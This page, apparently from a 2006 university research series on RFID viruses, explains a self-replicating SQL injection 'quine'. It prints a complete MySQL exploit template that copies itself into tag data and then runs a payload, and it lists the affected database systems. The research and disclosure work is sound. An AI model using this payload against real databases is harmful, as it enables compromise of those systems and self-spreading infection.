Go to the homepage of the Vrije Universiteit. Go to the homepage of the faculty of sciences.

SQL Virus Using Quines

A quine is a program that prints its own source code. If an RFID tag contains a quine, and it is executed on the database, the quine's source code can be copied onto other tags, spreading the virus.


For this virus to work, it is required that the database API allows multiple queries to be executed in a single API function call. To prevent errors, it is required that the API allows comments to be entered. To allow the quine to be executed at all, it is also required that the tag's contents are not escaped properly.


When a tag is scanned, its contents are loaded into the database using Query  1. The tag's contents and id will be inserted at the marked locations.

UPDATE ContainerContents SET OldContents='%contents%' WHERE TagID='%id%'
Query  1 - Updating known contents

If the contents read from the tag are not escaped properly, inserting a single quote (') into the contents field will allow an attacker to modify the query. This exploit modifies the query so that the virus is copied into the NewContents field. When a tag's content field is updated, the virus will be copied onto the tag, allowing it to infect other systems.

Exploit  1 shows the MySQL form of this virus.
%content%' WHERE TagId='%id%';

SET @a='UPDATE ContainerContents SET NewContents=concat(\'%content%\\\' WHERE TagId=\\\'%id%\\\'; SET @a=\', QUOTE(@a), \'; \', @a); %payload%; --';

UPDATE ContainerContents SET NewContents=concat('%content%\' WHERE TagId=\'%id%\'; SET @a=', QUOTE(@a), '; ', @a); %payload%; --
Exploit  1 - SQL virus using quines for MySQL. Whitespace is for readability only.
The first line is simply a continuation of the original query, it contains a quote to start the SQL injection. The actual virus starts after the semicolon. On the second line, a variable named @a is created and initialized. It contains the code on the third line, in textual form.

The third line updates the NewContents field for every record. It sets the field to a string which contains the code on the first line, and the first part of the second line: the variable declaration (SET @a=). Appended to the variable declaration is the variable's content. This is escaped using the QUOTE function. A semicolon is appended, after which the first two lines of the virus code have been copied to the field. As the variable contains the third line's code, appending the variable again (unescaped this time) appends the virus' third line to the database. The virus has now successfully propagated itself.

Following the duplication of the virus, the payload is executed. This is followed by a comment marker, to disable the original end of Query  1 (' WHERE TagID='%id%').


The virus can execute any SQL code the middleware is allowed to execute. Additionally, the virus can be used to propagate client-side scripting and Server-Side Include attacks.

Concrete Examples

The following examples are available:

Affected Systems

PostgreSQL and Microsoft SQL Server allow multiple queries in a single API call and are therefore vulnerable. MySQL also allows multiple queries, but this feature must explicitly be enabled. Oracle does not allow this through the OCI API, but it is possible through iSQL*Plus. All these API's also allow comments to be specified.

Previous SQL Virus Using Self-Referential Queries
Up How to Write an RFID Virus
Payloads Next

Last modified: Thursday, 02 March 2006 21:36, CET
If you spot a mistake, please e-mail the maintainer of this page.
Your browser does not fully support CSS. This may result in visual artifacts.